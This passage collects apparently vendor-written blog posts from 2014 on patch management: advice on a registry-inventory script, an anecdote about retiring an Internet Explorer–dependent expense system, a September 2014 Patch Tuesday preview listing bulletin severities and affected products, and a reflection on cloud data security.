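Run it under an account that can read HKLM, and treat a 'Unknown' status as a prompt to look at the entry by hand rather than as a pass: some installers write version strings that do not parse as dotted numbers. The per-user hive (HKCU) only reflects the account running the script, which is exactly the gap the post describes when users install their own browsers and runtimes.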

I can relate one personal story. We had an expense system that unfortunately required an extremely outdated version of Internet Explorer to be able to run. Because of this requirement, we kept certain machines available with the older version in order to be able to continue using the expense system. Users would have to remote into those systems to use the expense application without issue, or they would have to take manual steps to finish their expense report. We ended up switching to a SaaS-based solution for many of our HR applications, and the rest are slowly moving to this platform as well. It was a change that took the commitment of HR, IT, and upper management, but once completed, all parties were happier for doing it. Not only were we able to remove some very old and hard-to-secure systems from the environment, we made HR’s life easier as well as significantly decreasing the time and complexity of entering expenses.

Tell us more about the problems you are facing and the issues holding you back from maturing your patch process. We have heard many of the pains from our customers on how to improve their process further, but we would like to hear from you as well.

Patch Tuesday Advanced Notification September 2014

So far we have four bulletins announced for September 2014, one Critical and three Important. Back in August Microsoft put a hard deadline on implementing Update 1 (KB2919355) for Windows 8.1 and Server 2012 R2, making it so users need to install Update 1 in order to keep their systems updated.

The first patch Microsoft will be rolling out is for Internet Explorer and is Critical. For the past few months we have seen large numbers of vulnerabilities primarily around memory corruption and memory leaks being resolved in IE. It’s likely we are going to see a continuation of that trend that started back in June, but it’s probably going to be a fairly clean month for IE.

Of the three Important updates, there are two vulnerabilities that could result in a denial of service attack and one that could result in an elevation of privileges. These bulletins affect .Net Framework, the Windows Operating System and Lync Server. The .Net update is going to be the most important thing here and IT managers should make sure they are testing it adequately before rolling it out.

On the third party front, we are expecting an update from Opera any time now. They have updated their change log, but the new version (24) has not yet been made available on their downloads.

For Adobe we anticipate an update for Flash to be quite likely this month. So far in 2014 there has only been one patch Tuesday without a Flash update and that month there were two updates outside of patch Tuesday, one of which was a Zero Day. If there is a Flash release, you can expect a Microsoft Advisory update for IE to update the Flash plug-in and most likely a Google Chrome update to support the plug-in as well.

Microsoft Security Bulletins:

  • 1 bulletin is rated as Critical.
  • 3 bulletins are rated as Important.

Vulnerability Impact:

  • 1 bulletin addresses vulnerabilities which could allow Remote Code Execution.
  • 2 bulletins address vulnerabilities which could result in a Denial of Service.
  • 1 bulletin addresses vulnerabilities which could allow Elevation of Privileges.

Affected Products:

  • All supported Windows Operating Systems.
  • All supported Internet Explorer versions.
  • .Net Framework.
  • Lync Server.

Join us as we review the Microsoft and third-party releases for September Patch Tuesday in our next monthly Patch Tuesday webcast, which is scheduled for Wednesday, September 10th at 11 a.m. CDT. We will also discuss other product and patch releases since the August Patch Tuesday.

You can register for the Patch Tuesday webinar here.

Taking IP to the Cloud – Is it Time?

Keep your IT Security Garage Closed

A couple of years ago we moved from a rural community to a more active suburban area. Being closer to retail, we discovered that the area had much more traffic than our previous dwelling. Before, we hardly locked the front door. Now we had to take additional security measures to protect our valuables and family.

One day, a few months after settling into our new home, the garage door was left open. We were sure we had shut it the night before, but it was definitely open the next morning. All the valuables in our cars were stolen including my work PC and travel cards, my wife’s purse, and even the “big ball of keys” that usually gets stored in the drawer but happened to be in the car’s cup holder.

After cancelling all the cards and re-keying the house, we decided to increase our security efforts for the home. With recent attacks and loss of credit card data and even very personal photos of celebrities, many are asking how we can increase our security efforts.

Like my move to a more trafficked neighborhood, many organizations are considering creating either private, public, or hybrid Clouds. With today’s security, are we ready to move our valuable data and IP into the Cloud?

Recently I attended VMworld 2014, and many of the messages coming from VMware were around moving your data and infrastructure to the Cloud. They announced a couple of initiatives and products around virtualized infrastructure, rapid creation of applications, and security, all trying to build confidence for customers to move to the Cloud. Even the theme of the show was “Be brave”, which I translated as “make the move”.

I’m curious how many IT organizations have plans to move their critical data and workloads into the Cloud. Do you feel this move is brave or more like leaving your garage door open? Do you feel that there are enough ways to secure your valuable data in the Cloud as you move to a place with considerably more traffic or are you cautious with recent stories of data leaving popular Cloud implementations?

The good news is we have yet to see a major online retailer such as Amazon get hit with large data loss. It looks like building secure online applications does work. But are the benefits good enough to outweigh the risks of making the move?